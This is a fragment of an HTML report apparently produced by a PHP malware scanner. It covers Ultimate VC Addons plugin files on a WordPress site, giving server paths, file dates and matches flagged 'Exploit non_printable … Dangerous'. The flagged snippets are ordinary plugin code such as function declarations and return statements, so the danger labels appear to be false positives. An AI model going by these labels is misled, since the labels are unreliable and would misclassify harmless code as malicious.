<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_price_generate_design01'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design01</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_281").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/pricing/pricing-design06.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.82 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_282" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_price_generate_design06'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design06</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_282").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/pricing/pricing-design04.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_283" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_price_generate_design04'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design04</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_283").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/info-tables/info-table-design01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_284" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_info_table_generate_design01'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design01</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_284").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/info-tables/info-table-design04.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_285" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_info_table_generate_design04'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design04</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_285").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/info-tables/info-table-design03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.55 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_286" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 297</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_info_table_generate_design03'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design03</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_286").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/info-tables/info-table-design05.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.59 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_287" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 296</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_info_table_generate_design05'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design05</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_287").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/info-tables/info-table-design06.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_288" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_info_table_generate_design06'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design06</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_288").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/info-tables/info-table-design02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.55 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_289" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 297</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_info_table_generate_design02'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design02</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_289").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/ult_tab/ult_tab_element.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 16.54 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_290" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">= </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">(</span><span style="color: #0000BB">$desc_font_family</span><span style="color: #007700">); if(</span><span style="color: #0000BB">$dhfont_family</span><span style="color: #007700">!=</span><span style="color: #DD0000">''</span><span style="color: #007700">) </span><span style="color: #0000BB">$contain_bg </span><span style="color: #007700">.= </span><span style="color: #DD0000">'font-family:'</span><span style="color: #007700">.</span><span style="color: #0000BB">$dhfont_family</span><span style="color: #007700">.</span><span style="color: #DD0000">';'</span><span style="color: #007700">; } if (</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) { if(</span><span style="color: #0000BB">$desc_font_style</span><span style="color: #007700">!=</span><span style="color: #DD0000">''</span><span style="color: #007700">) </span><span style="color: #0000BB">$contain</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_290").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/Ultimate_VC_Addons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 50</span><br><table id="file_291" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_core_load'</span><span style="color: #007700">)) { function </span><span style="color: #0000BB">bsf_core_load</span><span style="color: #007700">() { global </span><span style="color: #0000BB">$bsf_core_version</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_core_path</span><span style="color: #007700">; if(</span><span style="color: #0000BB">is_file</span><span style="color: #007700">(</span><span style="color: #0000BB">realpath</span><span style="color: #007700">(</span><span style="color: #0000BB">$bsf_core_path</span><span style="color: #007700">.</span><span style="color: #DD0000">'/index.php'</span><span style="color: #007700">))) { include_once </span><span style="color: #0000BB">realpath</span><span style="color: #007700">(</span><span style="color: #0000BB">$bsf_core_path</span><span style="color: #007700">.</span><span style="color: #DD0000">'/index.php'</span><span style="color: #007700">); } } } </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'init'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf_core_load'</span><span style="color: #007700">, </span><span style="color: #0000BB">999 </span><span style="color: #007700">); } else</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_move_templates</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggle_updater</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_link_init</span><span style="color: #007700">( </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$target</span><span style="color: #007700">, </span><span style="color: #0000BB">$link_title</span><span style="color: #007700">, </span><span style="color: #0000BB">$rel </span><span style="color: #007700">) {</span>
</span>
